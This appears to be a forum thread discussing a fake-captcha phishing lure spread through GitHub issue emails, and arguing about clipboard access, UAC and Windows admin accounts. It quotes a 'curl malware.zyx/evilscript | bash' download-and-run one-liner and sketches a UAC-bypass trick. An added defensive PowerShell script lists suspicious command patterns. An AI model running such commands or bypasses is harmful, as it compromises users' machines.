
      Press Win+R, CTRL+V <enter>
From captcha to gotcha.

I could see junior developers falling for this. Hey, it's Github, it's legit, right? We get security notifications every second month about some lib everyone uses etc.

      "Oh look, captcha by running code, how neat!"
I don't think webpages should be able to fill your copy/paste buffer from a click without a content preview. They made it require a user action, such as clicking, thinking that would solve the problem, but it's still too weak. That's problem number 1.

People need to stop actioning any links from emails and/or believing that any content in an email has legitimacy. It doesn't. That's problem number 2.

Problem number 3: Windows still lets you root a machine by 1 line in powershell? What the @$$%&%&#$?

Github might need to stop people putting links in issues without them being checked by automated services that can validate the content as remotely legitimate. They're sending this stuff to people's email, don't tell me they're not aware this could be used for phishing! That's cyber security 101, in 2015.

Finally, Github, in being unable to act on the above, may need to better strip what they email to people, and essentially behave more like banks "you have a new issue in this repository..." and that's that. You then go there, there is no message, ok great. That would have taken care of this issue...

It seems Github needs to graduate a bit here.



"I could see junior developers falling for this" - I can see all sorts fucking up, not just juniors. It is the way of things.

"I don't think that...". I think that you have to train your troops effectively in what is harmful.

"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. It's been a long running project but I will succeed.


> Problem number 3: Windows still lets you root a machine by 1 line in powershell? What the @$$%&%&#$?

*sigh* It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates that it was taken under a user with admin privileges and UAC disabled.

Come on, now cry that Linux still lets you root a machine by 1 line in curl malware.zyx/evilscript | bash.


> … by 1 line in curl malware.zyx/evilscript | bash.

Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.


> it was taken under a user with admin privileges and UAC disabled.

You will have to accept that users either ask for this UAC to be turned off, or it gets turned off by the original installer of Windows for the user (presumably a non-technical user).

It's like telling traffic accident sufferers that they should've put on a seatbelt. True, but pointless.


> you will have to accept that users either ask this UAC to be turned off

Running with UAC disabled under an admin account?

That's not only a lack of a seatbelt, but wearing flip-flops too.

And I'm eating my own dogfood too: I've been running under a regular user since migrating from Vista, both on personal and work devices. Sometimes it's a PITA, sure, but it's manageable.


>Come on, now cry that Linux still lets you root a machine by 1 line in curl malware.zyx/evilscript | bash.

Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.


Glad I’m not the only one thinking about POSIX compliance!


I've started disabling the Run dialog for non-technical users, but unfortunately a GitHub attack targets users who likely have a real use for it sometimes.

The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.
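An added example, not from the thread, of the mitigation the comment above describes: disabling the Run dialog for a user through the "Remove Run menu from Start Menu" policy (the NoRun value, which also blocks Win+R), plus a review of that user's Run history in the RunMRU key for one-liners that look like pasted "captcha" commands. The pattern list is an assumption and should be extended to local needs.

```powershell
# Added example, not code from the original thread. Run under the affected
# user's account; the policy applies per user and takes effect after the
# user logs off and on again (or Explorer is restarted).

$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$mruKey    = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

function Disable-RunDialog {
    # NoRun = 1 removes "Run" from the Start menu and blocks Win+R for this user.
    if (-not (Test-Path $policyKey)) {
        New-Item -Path $policyKey -Force | Out-Null
    }
    New-ItemProperty -Path $policyKey -Name 'NoRun' -Value 1 `
        -PropertyType DWord -Force | Out-Null
}

function Get-SuspiciousRunHistory {
    # Assumed list of strings that commonly show up in pasted one-liners
    # (download-and-execute helpers, encoded commands, policy bypasses).
    $patterns = @('powershell', 'pwsh', 'mshta', 'curl', 'iwr', 'Invoke-WebRequest',
                  'iex', 'Invoke-Expression', 'EncodedCommand', 'bypass', 'http')

    if (-not (Test-Path $mruKey)) { return @() }

    # RunMRU stores each command under a single-letter value name ("a", "b", ...)
    # with the data suffixed by "\1"; the MRUList value only holds the ordering.
    $props = Get-ItemProperty -Path $mruKey
    $props.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |
        ForEach-Object {
            $cmd  = $_.Value -replace '\\1$', ''
            $hits = $patterns | Where-Object { $cmd -match [regex]::Escape($_) }
            [pscustomobject]@{
                Entry      = $_.Name
                Command    = $cmd
                Suspicious = ($hits.Count -gt 0)
                Matched    = ($hits -join ',')
            }
        }
}

Disable-RunDialog
Get-SuspiciousRunHistory | Format-Table -AutoSize
```

Entries flagged Suspicious are a triage hint for the analyst, not proof of compromise; a legitimate admin typing `powershell` into Run will match too.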


> The clipboard strategy feels like it should be easy to block too

yea, the browser should actually have each site ask for permission to modify the clipboard imho.


That might add another step but I think it is unlikely to help reduce the number of victims. If someone is willing to bring up the run prompt and paste whatever they have in the clipboard they are also likely to be social engineered into clicking yes on a dialog that tells them to allow clipboard modification.


This captcha is so bad... I'm gonna automate the solving of this captcha so whenever my browser shows me "Press Win+R, CTRL+V <enter>", it automatically runs cmd.exe with the clipboard content so I can get to the site content faster and with no interruption.

Yes, I'm a 10X Windows user.


>Windows still lets you root a machine by 1 line in powershell? What the @$$%&%&#$?

You say it's a problem, I say it is a virtue.

We can "root" Windows because we are root, specifically a user in the Administrators group because the first user account configured by Windows Setup is always an administrator account.

This is a virtue. We can do whatever we want with the computer we own and use. This is freedom par excellence that literally every other operating system family today wishes they could do without getting shouted down.

In an era of increasingly locked down operating systems that prevent us from truly owning our computers, administering them, Windows just lets us do that. I hope to god this never changes.


>>Windows still lets you root a machine by 1 line in powershell? What the @$$%&%&#$?

> We can do whatever we want with the computer we own and use.

There is a difference between what an owner of a computer can and should be able to do, versus what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.

MS Windows has a poor history of being able to do either.


Remember the old saying: With great power comes great responsibility.

Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.

Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.

Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.

Once more: I hope to god this never changes.


This is a wild take. Would you mind expanding a bit on the oppressive, locked down ecosystem that’s choking the free expression of Linux users?


For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking. There are also some who just smash in sudo -i as the first thing they ever do upon boot (guilty as charged) because they suffer RSI from typing sudo a trillion times.

There's also this impression that the operating system is just secure and you as the user are just protected like it's a law of physics. Spoiler alert, you are not and it's not a law of physics either. It's still your responsibility to secure the computer if you so desire and otherwise not do dumb shit like copypasta'ing commands from the internet.

I'm not even going to get into the politics that are package managers and repos, that's just straight bullshit that has more to do with human nature than computer science.

Speaking of politics, most of the FOSS community at large hates users using and administrators administering computers how they want. You must subscribe to the One Libre Way(tm) or you are a heathen doing it wrong. So much for freedom. The Windows community meanwhile is mostly composed of jaded engineers who are just happy to see others get stuff done and get through another day in one piece.

Windows from the start places the user at the controls with mostly no child safety locks in place (and you can remove what is there easily, eg: UAC), and with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

Having the sheer power to hose Windows with a single Powershell line is what freedom is. Freedom is both delightful and horrifying.


> Windows from the start places the user at the controls

Would this be the same Windows that now requires TPM2, UEFI Secure Boot, a Microsoft account to log in, and a special boot mode to use drivers not signed by Microsoft?


What I am writing below I mean genuinely, without malice, and in the hope it helps dispel some of the conclusions you have expressed above, if not for Linux itself (which I do not normally use) then for other Unix operating systems such as FreeBSD[0].

> For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking.

Setting aside the hyperbole, such as "everyone and their dog prefixes sudo to all commands" and "most of the FOSS community at large hates users", user/group/other permissions are one part of security in depth. Excessive use of sudo is indicative of an improperly configured system or use of software which lacks understanding of the OS which runs it. Both are causes for concern.

> Windows from the start places the user at the controls with mostly no child safety locks in place ...

To continue your analogy, child safety locks exist to minimize avoidable catastrophic situations for those unable to do same.

> ... with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

At first glance, this has a "victim blaming" flavour to it along the lines of "you should have known better." A more concerning implication is that this perspective does not take into consideration what happens when a blackhat attack is perpetrated.

What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you who executes it?

0 - https://docs.freebsd.org/en/books/handbook/introduction/


You will have to excuse me for effectively ignoring the rest of your comment since what I'm about to point out more than makes up for the things you pointed out.

>What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you who executes it?

The benefit is the sheer power to hose Windows with a single Powershell line.

In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

Windows essentially will not say no to what you ask of it, you have the freedom to do with your computer as you desire with Windows. With this power, this freedom, this virtue comes responsibility. You as the user must secure the system as desired from the ground up, you have the power to do so and the responsibility.

Computers are tools, Windows enabling your ability to use your computer as a tool is a virtue that is priceless especially in this day and age.

If you don't believe me, consider that Windows brought forth the era of personal computing to the commons and continues to enable them by nurturing an ecosystem that can cater to almost all users' desires that now spans literally decades.


> >What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you who executes it?

> The benefit is the sheer power to hose Windows with a single Powershell line.

> In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

The point which I think I am failing to convey is not about limiting what a person who owns a computer can do with it. Instead, it is that computers interacting with other computers can be introduced to code which is not "whatever you want with Windows", but instead "whatever someone else wants to do with your Windows."

In the case you presented above, nowhere is there consideration of malicious actors. Were this not a real concern, there would be no market for virus scanners (be they for Windows or other operating systems).

Here is an exercise to try out - replace first person tense in the text above with the equivalent of "someone other than me."


I truly don't understand your desire to remove Linux file permissions. I also don't get why you think it's difficult to do so. There are plenty of ways for you to enable yourself to hose your machine without having to enter a password.


> This is a virtue. We can do whatever we want with the computer we own and use.

You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.

Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.

Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.


> At least, not without intentionally opting into it.

Just to clarify: in Windows, users with administrative privileges will in theory still be asked to opt in every time before any process is elevated to administrative rights. It's just that Windows security is so awful that people have found many different creative ways around it over the years, but those are (sometimes) getting patched by Microsoft so they are considered "bugs".

For example, a process stores its executable path in memory writable by itself, so you could start a process that replaces its executable string with "C:\Windows\explorer.exe" and it would (for whatever reason) bypass the "ask for administrative rights" dialog popup. This is the sort of "security" that Windows is built around to its very core.

https://github.com/hfiref0x/UACME

> "This tool shows ONLY popular UAC bypass method used by malware, and re-implement some of them in a different way improving original concepts. *There are different, not yet known to the general public, methods. Be aware of this;*"

(also I think you are responding to a troll btw)


>(also I think you are responding to a troll btw)

You would be wrong.


That's exactly what a troll would say though :p



